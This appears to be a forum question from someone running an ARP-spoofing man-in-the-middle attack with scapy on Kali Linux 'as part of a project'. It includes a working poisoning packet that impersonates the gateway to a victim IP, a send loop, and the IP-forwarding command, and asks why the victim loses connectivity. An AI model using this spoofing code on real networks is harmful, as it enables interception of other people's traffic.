I am trying to conduct a MiTM attack using scapy, as a part of my project. Following are the details:
pkt=ARP(op=1,hwdst='00:0c:29:9c:70:2e',pdst='192.168.1.105',psrc='192.168.1.1')
send(pkt,loop=1)
hwdst=Kali Linux MAC (attacker)
pdst= Victims IP (victim)
psrc= Gateway router IP (router)
To conduct a MiTM attack I enabled 'ip forwarding', using following command:
echo '1' > /proc/sys/net/ipv4/ip_forward
On victims machine, I tried accessing google.com in browser, it doesnt connects !.
In Kali Linux, I enabled Wireshark, I do see packets being forwarded from Kali Linux to Google.com, but not from Kali to Victim's machine.
Q-1 / Any idea why the victim machine is unable to access google.com, via Kali Linux?
Q-2 / What exactly does this command do echo '1' > /proc/sys/net/ipv4/ip_forward
?